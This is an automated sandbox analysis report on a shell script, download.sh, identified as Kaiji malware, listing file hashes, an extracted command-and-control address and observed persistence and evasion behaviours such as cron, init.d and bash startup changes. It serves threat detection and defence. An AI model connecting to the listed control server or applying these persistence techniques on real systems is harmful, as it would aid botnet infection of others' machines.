General

  • Target

    download.sh

  • Size

    2KB

  • Sample

    250416-w94h3atygy

  • MD5

    544a2f391e2800bac07e883d902bcc75

  • SHA1

    cea67c26c372d03b795bbba678569256385d3b83

  • SHA256

    1dc484d51fb96c2097c2eb3695ff55d641e6778dbe8780cbbd0dbdfa688708ca

  • SHA512

    f281a43fb6443bf15069aee5987d06d493bc0f0f47b927aea17115db168e6bf3271e5f37a0dc7f76defd21b60c24e513fcda0c2f109ce26f5bd4b802de184a4b

Malware Config

Extracted

Family

kaiji

C2

154.40.47.248:888

Extracted

Family

kaiji

C2

154.40.47.248:888

Targets

    • Target

      download.sh

    • Size

      2KB

    • MD5

      544a2f391e2800bac07e883d902bcc75

    • SHA1

      cea67c26c372d03b795bbba678569256385d3b83

    • SHA256

      1dc484d51fb96c2097c2eb3695ff55d641e6778dbe8780cbbd0dbdfa688708ca

    • SHA512

      f281a43fb6443bf15069aee5987d06d493bc0f0f47b927aea17115db168e6bf3271e5f37a0dc7f76defd21b60c24e513fcda0c2f109ce26f5bd4b802de184a4b

    • Kaiji

      Kaiji payload

    • Kaiji family

    • File and Directory Permissions Modification

      Adversaries may modify file or directory permissions to evade defenses.

    • Executes dropped EXE

    • Modifies Watchdog functionality

      Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

    • Creates/modifies Cron job

      Cron allows running tasks on a schedule, and is commonly used for malware persistence.

    • Creates/modifies environment variables

      Creating/modifying environment variables is a common persistence mechanism.

    • Enumerates running processes

      Discovers information about currently running processes on the system

    • Modifies init.d

      Adds/modifies system service, likely for persistence.

    • Write file to user bin folder

    • Modifies Bash startup script

MITRE ATT&CK Enterprise v16

Tasks